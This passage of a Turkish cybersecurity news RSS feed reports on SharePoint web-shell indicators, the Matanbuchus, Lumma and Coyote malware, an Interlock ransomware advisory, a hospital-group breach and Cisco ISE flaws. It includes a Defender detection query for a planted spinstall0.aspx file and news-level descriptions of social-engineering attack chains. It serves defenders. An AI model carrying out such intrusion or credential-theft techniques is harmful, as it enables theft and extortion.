<p>Microsoft, sistemlerde saldırıya işaret edebilecek dosya ve log girdilerinin incelenmesini öneriyor. Aşağıdaki bulgulara dikkat edilmelidir:</p>
<ul>
<li><code>C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx</code> adlı dosyanın varlığı</li>
<li><code>ToolPane.aspx</code> dosyasına yapılan POST istekleri</li>
<li><code>SignOut.aspx</code> referanslı HTTP log girdileri</li>
</ul>
<h3>Defender ile Tespit Sorgusu:</h3>
<pre>DeviceFileEvents
| where FolderPath has "MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS"
| where FileName =~ "spinstall0.aspx"
   or FileName has "spinstall0"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine,
          FileName, FolderPath, ReportId, ActionType, SHA256
| order by Timestamp desc
    </pre>
<p>Eğer dosya tespit edilirse, etkilenen sunucuda ve bağlı sistemlerde geniş çaplı bir güvenlik analizi yapılması gerekmektedir.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>&amp;quot;IT Destek&amp;quot; Adı Altında Sisteminize Sızıyorlar! Matanbuchus 3.0 ile Microsoft Teams Üzerinden Gerçekleşen Tehlikeli Yeni Saldırı Yöntemi Ortaya Çıktı</title>
<link>https://www.ajansexpres.com.tr/it-destek-adi-altinda-sisteminize-siziyorlar-matanbuchus-30-ile-microsoft-teams-uzerinden-gerceklesen-tehlikeli-yeni-saldiri-yoentemi-ortaya-cikti</link>
<guid>https://www.ajansexpres.com.tr/it-destek-adi-altinda-sisteminize-siziyorlar-matanbuchus-30-ile-microsoft-teams-uzerinden-gerceklesen-tehlikeli-yeni-saldiri-yoentemi-ortaya-cikti</guid>
<description><![CDATA[ Matanbuchus Loader’ın yeni sürümü, Microsoft Teams üzerinden yapılan sahte “IT Destek” çağrılarıyla sistemlere sızarak yalnızca RAM&#039;de çalışan ve antivirüsleri atlatan gelişmiş bir fidye yazılım saldırısına zemin hazırlıyor. Kurumlar, özellikle Quick Assist taleplerine karşı dikkatli olmalı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d30f1ae31.webp" length="27772" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:39 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Matanbuchus 3.0 nasıl çalışıyor, Microsoft Teams üzerinden nasıl yayılıyor, hangi ülkeler ve kurumlar hedefte, hangi güvenlik önlemleri alınmalı</media:keywords>
<content:encoded><![CDATA[<!-- Özet kutusu -->
<div><strong> Özet:</strong><br><span> Microsoft Teams üzerinden gelen sahte “IT Destek” çağrısıyla yayılan <strong>Matanbuchus 3.0</strong> zararlısı, sistemlere sızarak fidye yazılım saldırılarına zemin hazırlıyor. RAM’de çalışan, antivirüsleri atlatan ve Skype trafiği gibi davranan bu siber tehdide karşı dikkatli olun! </span></div>
<h1>“IT Destek” Kılığında Saldırıyorlar! Matanbuchus 3.0 ile Microsoft Teams Üzerinden Siber Sızma!</h1>
<p><strong> Yeni keşfedilen Matanbuchus 3.0 zararlısı, Microsoft Teams üzerinden sahte IT destek çağrılarıyla sistemlere sızıyor.</strong> Sosyal mühendislik teknikleriyle kullanıcıları kandıran saldırganlar, zararlı yazılımı sistemlere <em>hiçbir antivirüs uyarısı olmadan</em> yerleştirmeyi başarıyor.</p>
<p>Matanbuchus Loader’ın 3. sürümü, Quick Assist ve dosya paylaşımı yoluyla sisteme sızıyor. Ardından zararlı bir <code>libcurl.dll</code> dosyası, <strong>GenericUpdater.exe</strong> üzerinden çalıştırılıyor. Bu yöntem “DLL Sideloading” olarak biliniyor ve güvenliğe takılmadan çalışabiliyor.</p>
<ul>
<li>Microsoft Teams üzerinden sahte bir “IT Destek” araması yapılır</li>
<li>Kullanıcıdan Quick Assist açması istenir</li>
<li>“GenericUpdater.exe” dosyası gönderilir</li>
<li>libcurl.dll üzerinden <strong>Matanbuchus</strong> belleğe enjekte edilir</li>
<li>Arka planda sistem taraması başlar</li>
</ul>
<p>Bu saldırılar şu an aktif olarak <strong>Avrupa, ABD ve Türkiye</strong> gibi ülkelerdeki şirketleri hedef alıyor. Özellikle Microsoft Teams kullanan kurumlar, devlet yapıları ve uzaktan çalışanlar tehdit altında.</p>
<ul>
<li><strong>Diskte iz bırakmadan</strong> sadece RAM’de çalışır</li>
<li><strong>EDR atlatır</strong> – dolaylı sistem çağrıları kullanır</li>
<li><strong>Sistem konfigürasyonunu</strong> MurmurHash3 ve Salsa20 ile şifreli saklar</li>
<li><strong>Skype trafiği gibi davranarak</strong> C2 sunucusuna veri gönderir</li>
<li>PowerShell, CMD, MSI installer ve WMI gibi yöntemlerle farklı şekillerde tetiklenebilir</li>
</ul>
<ul>
<li>Teams çağrılarını kimden geldiğine bakmadan kabul etmeyin</li>
<li>Quick Assist isteklerini reddedin, teyitsiz bağlantı kurmayın</li>
<li>“GenericUpdater.exe” gibi belirsiz dosyaları çalıştırmayın</li>
<li>EDR sistemlerinizi güncel tutun, davranışsal analiz desteği olan çözümler kullanın</li>
<li>PowerShell ve CMD komutlarına kısıtlama getirin</li>
</ul>
<!-- Kapanış -->
<p><strong>Unutmayın:</strong> Güvenli görünen araçlar (Teams, Quick Assist) bile saldırganlar tarafından suistimal edilebilir. Her çağrıya ve dosyaya şüpheyle yaklaşın. Bu saldırı şimdi aktif. Tehdit kapınızda olabilir!</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Lumma zararlı yazılımı yeniden faaliyette: Altyapısını hızla toparlayarak eski seviyelerine ulaştı</title>
<link>https://www.ajansexpres.com.tr/lumma-zararli-yazilimi-yeniden-faaliyette-altyapisini-hizla-toparlayarak-eski-seviyelerine-ulasti</link>
<guid>https://www.ajansexpres.com.tr/lumma-zararli-yazilimi-yeniden-faaliyette-altyapisini-hizla-toparlayarak-eski-seviyelerine-ulasti</guid>
<description><![CDATA[ Mayıs ayında binlerce alan adı ve sunucu altyapısının ele geçirilmesiyle büyük darbe alan Lumma infostealer zararlı yazılımı, kısa süre içinde toparlanarak yeniden aktif hale geldi. Trend Micro’nun analizlerine göre, Lumma şu anda çoklu platformlarda zararlı faaliyetlerini sürdürüyor ve eski etkinlik seviyelerine yaklaştı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d30b3da09.webp" length="39418" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:35 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Lumma zararlı yazılımı nasıl geri döndü, hangi yöntemlerle bulaşıyor, hangi altyapı sağlayıcıları kullanılıyor, kolluk kuvvetlerinin müdahalesi ne ölçüde etkili oldu</media:keywords>
<content:encoded><![CDATA[<p><br data-start="475" data-end="478">Lumma isimli infostealer (bilgi çalan) zararlı yazılımı, Mayıs ayında gerçekleştirilen geniş çaplı kolluk kuvveti operasyonunun ardından yeniden faaliyete geçti. Operasyon kapsamında 2.300 alan adı ve altyapı unsurları ele geçirilmişti.</p>
<p></p>
<p data-start="716" data-end="990">Yazılım hizmet olarak sunulan bir modelle (Malware-as-a-Service - MaaS) dağıtılan Lumma, operasyon sonrasında tamamen kapanmasa da büyük bir kesintiye uğramıştı. Haziran ayı başında yapılan analizler, Lumma faaliyetlerinin durduğunu değil, sadece yavaşladığını ortaya koydu.</p>
<p data-start="992" data-end="1203">Lumma'nın yöneticileri, XSS forumları üzerinden yaptıkları açıklamada merkezi sunucularının ele geçirilmediğini, ancak uzaktan silindiğini belirtti. Aynı mesajda, yeniden yapılanma sürecinin başladığı duyuruldu.</p>
<p data-start="1205" data-end="1494"><strong data-start="1205" data-end="1251">Siber suç çevresinde yeniden güven kazandı</strong><br data-start="1251" data-end="1254">Trend Micro tarafından yayımlanan son rapora göre, Lumma zararlı yazılımı operasyonları neredeyse eski yoğunluğuna ulaştı. Şirketin ağ telemetrisi verileri, zararlı altyapının birkaç hafta içinde yeniden etkin hale getirildiğini gösteriyor.</p>
<p data-start="1496" data-end="1682">Raporda, "Lumma Stealer ve ilişkili altyapıya yönelik kolluk kuvveti müdahalesinin ardından, Lumma'nın operasyonlarında açık bir yeniden yapılanma süreci gözlemlendi" ifadeleri yer aldı.</p>
<p data-start="1684" data-end="1950"><strong data-start="1684" data-end="1723">Yeni altyapı ve farklı sağlayıcılar</strong><br data-start="1723" data-end="1726">Lumma, geçmişte olduğu gibi yine yasal bulut altyapılarını kötüye kullanarak trafiğini gizlemeye devam ediyor. Ancak artık Cloudflare yerine, genellikle Rusya merkezli Selectel gibi alternatif sağlayıcılara yönelmiş durumda.</p>
<p data-start="1952" data-end="2099"><strong data-start="1952" data-end="1983">Dört farklı bulaşma yöntemi</strong><br data-start="1983" data-end="1986">Trend Micro uzmanları, Lumma’nın şu anda dört ana dağıtım kanalı üzerinden bulaşma gerçekleştirdiğini belirtiyor:</p>
<ul data-start="2101" data-end="3045">
<li data-start="2101" data-end="2357">
<p data-start="2103" data-end="2357"><strong data-start="2103" data-end="2150">Sahte yazılım kırma araçları ve keygen’ler:</strong> Manipüle edilmiş arama sonuçları ve sahte reklamlarla kullanıcılar, sistem bilgilerini toplayan TDS (Traffic Detection Systems) tabanlı sahte sitelere yönlendiriliyor. Ardından Lumma indiricisi sunuluyor.</p>
</li>
<li data-start="2358" data-end="2568">
<p data-start="2360" data-end="2568"><strong data-start="2360" data-end="2381">ClickFix yöntemi:</strong> Ele geçirilmiş sitelerde gösterilen sahte CAPTCHA sayfaları, kullanıcıyı PowerShell komutları çalıştırmaya yönlendiriyor. Lumma doğrudan belleğe yüklenerek tespit edilmekten kaçınıyor.</p>
</li>
<li data-start="2569" data-end="2773">
<p data-start="2571" data-end="2773"><strong data-start="2571" data-end="2600">GitHub üzerinden dağıtım:</strong> Yapay zekâ ile üretilmiş içeriklerle hazırlanan sahte oyun hileleri tanıtılıyor. Bu GitHub depolarında, genellikle "TempSpoofer.exe" gibi zararlı dosyalar barındırılıyor.</p>
</li>
<li data-start="2774" data-end="3045">
<p data-start="2776" data-end="3045"><strong data-start="2776" data-end="2800">YouTube ve Facebook:</strong> Sahte yazılımları tanıtan videolar ve paylaşımlar, kullanıcıları dış bağlantılara yönlendirerek Lumma’nın yüklendiği sitelere ulaştırıyor. Bu siteler, güvenilir platformlara benzemesi için genellikle sites.google.com gibi hizmetleri kullanıyor.</p>
</li>
</ul>
<p data-start="3047" data-end="3396"><strong data-start="3047" data-end="3089">Uzmanlara göre baskınlar yeterli değil</strong><br data-start="3089" data-end="3092">Trend Micro’nun değerlendirmesine göre, Lumma örneğinde olduğu gibi yalnızca dijital altyapıya yapılan müdahaleler, yazılım geliştiricilerini durdurmaya yetmiyor. Herhangi bir gözaltı ya da dava süreci olmaksızın yapılan operasyonlar, bu tür tehdit aktörleri tarafından geçici bir engel olarak görülüyor.</p>
<p data-start="3398" data-end="3580"><strong data-start="3398" data-end="3410"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Coyote zararlı yazılımı, Windows erişilebilirlik altyapısını kullanarak banka ve kripto hesaplarını hedef alıyor</title>
<link>https://www.ajansexpres.com.tr/coyote-zararli-yazilimi-windows-erisilebilirlik-altyapisini-kullanarak-banka-ve-kripto-hesaplarini-hedef-aliyor</link>
<guid>https://www.ajansexpres.com.tr/coyote-zararli-yazilimi-windows-erisilebilirlik-altyapisini-kullanarak-banka-ve-kripto-hesaplarini-hedef-aliyor</guid>
<description><![CDATA[ Yeni bir Coyote bankacılık truva atı varyantı, Windows’un erişilebilirlik özelliği olan UI Automation (UIA) sistemini kötüye kullanarak kullanıcıların hangi banka veya kripto para borsalarına eriştiğini tespit ediyor. Uzmanlara göre bu yöntem, geleneksel güvenlik yazılımlarını atlatma konusunda oldukça etkili. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d3073e289.webp" length="56760" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:31 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Coyote zararlı yazılımı nasıl çalışıyor, Windows UIA hangi amaçla kötüye kullanılıyor, hangi bankalar ve borsalar hedef alınıyor, Microsoft bu duruma nasıl yanıt verecek</media:keywords>
<content:encoded><![CDATA[<p><br data-start="476" data-end="479">Coyote isimli zararlı yazılımın yeni bir sürümü, Microsoft’un Windows işletim sisteminde sunduğu UI Automation (UIA) altyapısını kötüye kullanarak banka ve kripto para borsalarına erişen kullanıcıların kimlik bilgilerini hedef alıyor.</p>
<p></p>
<p data-start="715" data-end="1034">Microsoft UIA, erişilebilirlik ihtiyaçları için geliştirilmiş bir API sistemi olarak yazılımların arayüz bileşenlerine dışarıdan erişim sağlamaya yarıyor. Uygulamaların arayüz elemanlarını gezmek, özelliklerini okumak ve bu elemanlarla etkileşime geçmek için kullanılan sistem, siber saldırganların da ilgisini çekiyor.</p>
<p data-start="1036" data-end="1315"><strong data-start="1036" data-end="1079">Gerçek saldırılar Şubat 2025’te başladı</strong><br data-start="1079" data-end="1082">Akamai tarafından yapılan açıklamaya göre, söz konusu tekniğin kötüye kullanılabileceği uyarısı Aralık 2024’te yapılmıştı. Ancak Şubat 2025 itibarıyla bu yöntemin zararlı yazılımlar tarafından sahada kullanıldığı ilk kez gözlemlendi.</p>
<p data-start="1317" data-end="1571"><strong data-start="1317" data-end="1349">Coyote zararlısının gelişimi</strong><br data-start="1349" data-end="1352">İlk kez Şubat 2024’te belgelenen Coyote, ağırlıklı olarak Brezilya merkezli bankacılık uygulamalarını hedef alıyor. Zararlı yazılımın önceki sürümleri keylogger ve sahte giriş ekranı gibi yöntemlerle veri toplamaktaydı.</p>
<p data-start="1573" data-end="1743">Yeni varyantta ise sabit hedefli uygulamalarda geleneksel yöntemler kullanılmaya devam ederken, web tarayıcısı üzerinden erişilen hizmetlerde UIA sistemi devreye giriyor.</p>
<p data-start="1745" data-end="2005"><strong data-start="1745" data-end="1791">Tarayıcı penceresi üzerinden adres tespiti</strong><br data-start="1791" data-end="1794">Coyote, kullanıcı bir bankacılık ya da kripto hizmetini tarayıcıda açtığında, pencere başlığı üzerinden tanımlama yapamazsa UIA aracılığıyla adres çubuğu veya sekme içeriğini okuyarak hedef siteyi tespit ediyor.</p>
<p data-start="2007" data-end="2232">Elde edilen bilgiler, önceden tanımlanmış 75 hizmetlik bir liste ile karşılaştırılıyor. Bu listede Banco do Brasil, CaixaBank, Banco Bradesco, Santander, Sicredi, Binance, Electrum ve Foxbit gibi finansal kurumlar yer alıyor.</p>
<p data-start="2234" data-end="2547"><strong data-start="2234" data-end="2284">Kimlik bilgisi hırsızlığına zemin hazırlanıyor</strong><br data-start="2284" data-end="2287">Şu anda yalnızca keşif aşamasında kullanılan bu yöntemle ilgili olarak, Akamai araştırmacıları UIA'nın kullanıcı tarafından girilen verileri (örneğin kullanıcı adı ve şifre) çalmak için nasıl kullanılabileceğini gösteren bir kavramsal kanıt (PoC) da yayımladı.</p>
<p data-start="2549" data-end="2755"><strong data-start="2549" data-end="2585">Microsoft henüz açıklama yapmadı</strong><br data-start="2585" data-end="2588">Microsoft’un UIA sistemi için herhangi bir güvenlik önlemi getirip getirmeyeceği belirsizliğini koruyor. Şirketle yapılan iletişim girişimlerine henüz yanıt alınamadı.</p>
<p data-start="2757" data-end="2977">Uzmanlar, Android ekosisteminde de benzer şekilde Erişilebilirlik Hizmetlerinin uzun yıllardır zararlı yazılımlar tarafından istismar edildiğine dikkat çekiyor. Google, bu konuda çeşitli güvenlik önlemleri geliştirmişti.</p>
<p data-start="2979" data-end="3165"><strong data-start="2979" data-end="2991"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>CISA ve FBI&amp;apos;dan Interlock fidye yazılımı için kritik uyarı: Sağlık sektörü başta olmak üzere hedef genişliyor</title>
<link>https://www.ajansexpres.com.tr/cisa-ve-fbidan-interlock-fidye-yazilimi-icin-kritik-uyari-saglik-sektoeru-basta-olmak-uzere-hedef-genisliyor</link>
<guid>https://www.ajansexpres.com.tr/cisa-ve-fbidan-interlock-fidye-yazilimi-icin-kritik-uyari-saglik-sektoeru-basta-olmak-uzere-hedef-genisliyor</guid>
<description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) ile FBI, Interlock fidye yazılımı grubunun artan saldırılarına karşı uyarıda bulundu. Sağlık kurumlarını, kritik altyapıyı ve şirketleri hedef alan saldırılarda, şifreleme öncesi veri sızdırılarak çifte şantaj yöntemleri uygulanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d30327935.webp" length="33430" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:27 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Interlock fidye yazılımı hangi kurumları hedef alıyor, çifte şantaj yönteminde ne tür veriler kullanılıyor, FileFix yöntemi nasıl çalışıyor, hangi siber güvenlik önlemleri öneriliyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="449" data-end="452">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) ile Federal Soruşturma Bürosu (FBI), Interlock fidye yazılımı grubunun son dönemde artan saldırılarına karşı bir uyarı yayımladı. Uyarı, Sağlık ve İnsan Hizmetleri Bakanlığı (HHS) ve Çok Eyaletli Bilgi Paylaşım ve Analiz Merkezi (MS-ISAC) iş birliğiyle hazırlandı.</p>
<p></p>
<p data-start="772" data-end="959">Haziran 2025’e kadar olan saldırıların incelenmesiyle elde edilen bulgular, uyarı metninde yer alan siber tehdit göstergeleri (IoC) ve savunma önlemleriyle birlikte kamuoyuyla paylaşıldı.</p>
<p data-start="961" data-end="1201"><strong data-start="961" data-end="1007">Hedef: Sağlık sektörü ve kritik altyapılar</strong><br data-start="1007" data-end="1010">Eylül 2024’te ortaya çıkan Interlock fidye yazılımı grubu, kısa sürede küresel çapta birçok sektöre saldırı düzenledi. Sağlık hizmetleri, grubun en sık hedef aldığı alanların başında geliyor.</p>
<p data-start="1203" data-end="1479">Geçtiğimiz haftalarda Interlock grubu, böbrek sağlığı alanında hizmet veren Fortune 500 şirketi DaVita’nın sistemlerinden 1,5 terabayt veri çaldığını ve sızdırdığını duyurdu. Grup ayrıca 120'den fazla sağlık merkezi bulunan Kettering Health sistemlerine de sızdığını açıkladı.</p>
<p data-start="1481" data-end="1813"><strong data-start="1481" data-end="1512">Olağandışı sızma yöntemleri</strong><br data-start="1512" data-end="1515">FBI’ın yaptığı teknik analizlere göre, Interlock aktörleri genellikle zararlı yazılımı, kötü niyetli bağlantılar içeren yasal görünümlü internet siteleri aracılığıyla yayıyor. Bu “drive-by download” yöntemi, fidye yazılımı grupları arasında nadir rastlanan bir erişim tekniği olarak dikkat çekiyor.</p>
<p data-start="1815" data-end="2056">Saldırganlar, hedef sistemlere erişim sağladıktan sonra hem verileri şifreliyor hem de öncesinde dışarı aktarılan dosyalarla çifte şantaj yapıyor. Kurbanlar, hem verilerin geri yüklenmesi hem de ifşa edilmemesi için fidye ödemeye zorlanıyor.</p>
<p data-start="2058" data-end="2447"><strong data-start="2058" data-end="2102">Yeni sosyal mühendislik tekniği: FileFix</strong><br data-start="2102" data-end="2105">Interlock grubu, bu ay itibarıyla yeni bir sosyal mühendislik tekniği olan <strong data-start="2180" data-end="2191">FileFix</strong> yöntemini de kullanmaya başladı. Bu yöntemde, Windows Dosya Gezgini ve HTML uygulamaları (.HTA) gibi güvenilir arayüz öğeleri kullanılarak kurbanların hiçbir güvenlik uyarısı almadan zararlı PowerShell ya da JavaScript kodlarını çalıştırmaları sağlanıyor.</p>
<p data-start="2449" data-end="2613"><strong data-start="2449" data-end="2478">Alınması gereken önlemler</strong><br data-start="2478" data-end="2481">CISA ve FBI, kurumların aşağıdaki adımları uygulayarak Interlock tehdidine karşı savunmalarını güçlendirmesi gerektiğini belirtiyor:</p>
<ul data-start="2615" data-end="3015">
<li data-start="2615" data-end="2687">
<p data-start="2617" data-end="2687">DNS filtreleme ve web erişim güvenlik duvarlarının etkinleştirilmesi</p>
</li>
<li data-start="2688" data-end="2754">
<p data-start="2690" data-end="2754">Sosyal mühendislik saldırılarına karşı çalışanların eğitilmesi</p>
</li>
<li data-start="2755" data-end="2817">
<p data-start="2757" data-end="2817">Sistem, yazılım ve donanım yazılımlarının güncel tutulması</p>
</li>
<li data-start="2818" data-end="2873">
<p data-start="2820" data-end="2873">Ağ segmentasyonu yapılarak erişim sınırlandırılması</p>
</li>
<li data-start="2874" data-end="2933">
<p data-start="2876" data-end="2933">Kimlik ve erişim yönetimi politikalarının oluşturulması</p>
</li>
<li data-start="2934" data-end="3015">
<p data-start="2936" data-end="3015">Çok faktörlü kimlik doğrulamanın (MFA) tüm servislerde zorunlu hale getirilmesi</p>
</li>
</ul>
<p data-start="3017" data-end="3216"><strong data-start="3017" data-end="3029"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Avrupa merkezli AMEOS sağlık ağı siber saldırıya uğradı: Hasta, çalışan ve ortak verileri tehlikede</title>
<link>https://www.ajansexpres.com.tr/avrupa-merkezli-ameos-saglik-agi-siber-saldiriya-ugradi-hasta-calisan-ve-ortak-verileri-tehlikede</link>
<guid>https://www.ajansexpres.com.tr/avrupa-merkezli-ameos-saglik-agi-siber-saldiriya-ugradi-hasta-calisan-ve-ortak-verileri-tehlikede</guid>
<description><![CDATA[ İsviçre, Almanya ve Avusturya’da 100’ün üzerinde sağlık tesisine sahip olan AMEOS Group, dış kaynaklı bir siber saldırı sonucu hassas verilere yetkisiz erişim sağlandığını duyurdu. Kurum, GDPR kapsamında kamuoyunu bilgilendirirken, olası veri sızıntısına karşı dikkatli olunması çağrısında bulundu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2ff1e116.webp" length="42680" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:23 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>AMEOS veri ihlalinde hangi bilgiler tehlikeye girdi, saldırının kaynağı belli mi, kurum ne tür önlemler aldı, veri sızıntısı olup olmadığı nasıl tespit edilecek</media:keywords>
<content:encoded><![CDATA[<p><br data-start="450" data-end="453">Avrupa'nın en büyük özel sağlık ağlarından biri olan AMEOS Group, bilgi güvenliğini ihlal eden bir siber saldırıya uğradığını açıkladı. Kurum, 22 Temmuz 2025’te resmi internet sitesinde yaptığı duyuruda, saldırının ardından bazı hasta, çalışan ve iş ortaklarına ait verilerin tehlikeye girmiş olabileceğini belirtti.</p>
<p></p>
<p data-start="771" data-end="978">Veri ihlali, Avrupa Birliği Genel Veri Koruma Tüzüğü (GDPR) kapsamında kamuya duyuruldu. AMEOS, GDPR’nin 34. maddesi uyarınca potansiyel olarak etkilenen bireyleri bilgilendirme yükümlülüğünü yerine getirdi.</p>
<p data-start="980" data-end="1374"><strong data-start="980" data-end="1021">Üç ülkede 100’den fazla sağlık tesisi</strong><br data-start="1021" data-end="1024">Zürih merkezli AMEOS Group, İsviçre, Almanya ve Avusturya’da hastane, klinik, rehabilitasyon merkezi ve bakım evi olmak üzere 100’ün üzerinde tesiste 18.000 kişiyi istihdam ediyor. Kurum, 10.000’i aşkın yatak kapasitesi ve 1,4 milyar doların üzerindeki yıllık geliriyle DACH bölgesindeki en büyük özel sağlık hizmeti sağlayıcılarından biri konumunda.</p>
<p data-start="1376" data-end="1618"><strong data-start="1376" data-end="1420">Yetkisiz erişim ve olası veri suistimali</strong><br data-start="1420" data-end="1423">Açıklamaya göre, tüm güvenlik önlemlerine rağmen sistemlere yetkisiz erişim sağlandı. Etkilenen veriler arasında hasta bilgileri, çalışan ve ortaklara ait kişisel ve iletişim verileri yer alıyor.</p>
<p data-start="1620" data-end="1939">“Size ya da şirketinize ait iletişim bilgileri ile birlikte hastalar, çalışanlar ve iş ortaklarına ait veriler, izinsiz erişim nedeniyle etkilenmiş olabilir. Bu verilerin internette kötü niyetli şekilde kullanılması ya da üçüncü taraflarla paylaşılması ihtimali göz ardı edilemez.” ifadeleriyle kamuoyu bilgilendirildi.</p>
<p data-start="1941" data-end="2200"><strong data-start="1941" data-end="1983">Sistemler kapatıldı, dış destek alındı</strong><br data-start="1983" data-end="1986">Saldırının ardından tüm IT sistemleri devre dışı bırakılırken, iç ve dış ağ bağlantıları kesildi. AMEOS, mevcut önlemleri güçlendirerek siber güvenlik ve adli bilişim alanında uzman dış ekiplerle çalışmaya başladı.</p>
<p data-start="2202" data-end="2447">Olayla ilgili olarak ilgili ülkelerdeki veri koruma otoritelerine bilgi verildi ve polise suç duyurusunda bulunuldu. Kurumdan sağlık hizmeti alan kişilere, olası kimlik avı ve dolandırıcılık girişimlerine karşı dikkatli olmaları uyarısı yapıldı.</p>
<p data-start="2449" data-end="2688"><strong data-start="2449" data-end="2489">Henüz veri sızıntısı tespit edilmedi</strong><br data-start="2489" data-end="2492">AMEOS, şu ana kadar çalınan verilerin internette paylaşıldığına dair herhangi bir kanıt bulunmadığını belirtti. Soruşturmanın sürdüğünü ve gelişmeler oldukça kamuoyuna bilgi verileceğini açıkladı.</p>
<p data-start="2690" data-end="2865">“Şu anda kişisel verilerinizin gerçekten sızdırıldığına dair somut bir bulgu bulunmamaktadır. İnceleme tamamlandığında bu sayfa üzerinden bilgilendirme yapılacaktır.” denildi.</p>
<p data-start="2867" data-end="3083">Saldırının fidye yazılımı kaynaklı olup olmadığı veya herhangi bir veri şifreleme işlemi gerçekleşip gerçekleşmediği henüz bilinmiyor. Şu ana dek herhangi bir fidye yazılımı grubu saldırının sorumluluğunu üstlenmedi.</p>
<p data-start="3085" data-end="3262"><strong data-start="3085" data-end="3097"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Cisco, ISE yazılımındaki kritik açıkların aktif olarak istismar edildiğini doğruladı: Yama uygulanmayan sistemler risk altında</title>
<link>https://www.ajansexpres.com.tr/cisco-ise-yazilimindaki-kritik-aciklarin-aktif-olarak-istismar-edildigini-dogruladi-yama-uygulanmayan-sistemler-risk-altinda</link>
<guid>https://www.ajansexpres.com.tr/cisco-ise-yazilimindaki-kritik-aciklarin-aktif-olarak-istismar-edildigini-dogruladi-yama-uygulanmayan-sistemler-risk-altinda</guid>
<description><![CDATA[ Cisco, kimlik ve erişim yönetimi platformu ISE’de tespit edilen ve 10 üzerinden 10 CVSS puanına sahip üç kritik uzaktan kod çalıştırma (RCE) açığının sahada aktif şekilde istismar edildiğini açıkladı. Şirket, kullanıcıların acilen güvenlik yamalarını uygulaması gerektiğini belirtti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2fb7db86.webp" length="49822" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:19 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Cisco ISEdeki açıklar nasıl çalışıyor, hangi sürümler etkileniyor, saldırganlar bu açıkları nasıl istismar ediyor, sistem yöneticileri hangi sürümlere geçmeli</media:keywords>
<content:encoded><![CDATA[<p><br data-start="462" data-end="465">Cisco, kurumların ağ erişimini ve güvenlik politikalarını yönettiği <strong data-start="533" data-end="567">Identity Services Engine (ISE)</strong> yazılımında tespit edilen üç kritik güvenlik açığının aktif olarak kötü amaçlı saldırganlar tarafından kullanıldığını bildirdi. Açıklar, herhangi bir kimlik doğrulama gerektirmeden sistemde root yetkisiyle kod çalıştırılmasına imkân tanıyor.</p>
<p></p>
<p data-start="811" data-end="1092"><strong data-start="811" data-end="854">Cisco Güvenlik İstihbarat Ekibi (PSIRT)</strong> tarafından yayımlanan güncel uyarıda, "Temmuz 2025 itibarıyla bu açıkların bazılarına yönelik sahada istismar girişimleri gözlemlenmiştir" denildi. Şirket, etkilenen sistem yöneticilerinin acilen ilgili yamaları yüklemesini tavsiye etti.</p>
<p data-start="1094" data-end="1253"><strong data-start="1094" data-end="1131">Açıkların detayları ve etki alanı</strong><br data-start="1131" data-end="1134">Cisco tarafından sırasıyla 25 Haziran ve 16 Temmuz 2025 tarihlerinde duyurulan açıklar, aşağıdaki gibi sınıflandırıldı:</p>
<ul data-start="1255" data-end="1994">
<li data-start="1255" data-end="1546">
<p data-start="1257" data-end="1546"><strong data-start="1257" data-end="1276">CVE-2025-20281:</strong> Cisco ISE ve ISE-PIC yazılımlarında kimlik doğrulama gerektirmeyen uzaktan kod çalıştırma açığı. Özel olarak hazırlanmış API istekleriyle saldırgan, işletim sisteminde root yetkisiyle komut çalıştırabiliyor.<br data-start="1484" data-end="1487"><em data-start="1489" data-end="1511">Düzeltilen sürümler:</em> ISE 3.3 Patch 7 ve ISE 3.4 Patch 2</p>
</li>
<li data-start="1548" data-end="1786">
<p data-start="1550" data-end="1786"><strong data-start="1550" data-end="1569">CVE-2025-20282:</strong> Cisco ISE 3.4 sürümünde dosya doğrulaması yapılmayan bir alan aracılığıyla kötü niyetli dosyaların yüklenip root yetkisiyle çalıştırılmasına olanak tanıyan dosya yükleme açığı.<br data-start="1746" data-end="1749"><em data-start="1751" data-end="1770">Düzeltilen sürüm:</em> ISE 3.4 Patch 2</p>
</li>
<li data-start="1788" data-end="1994">
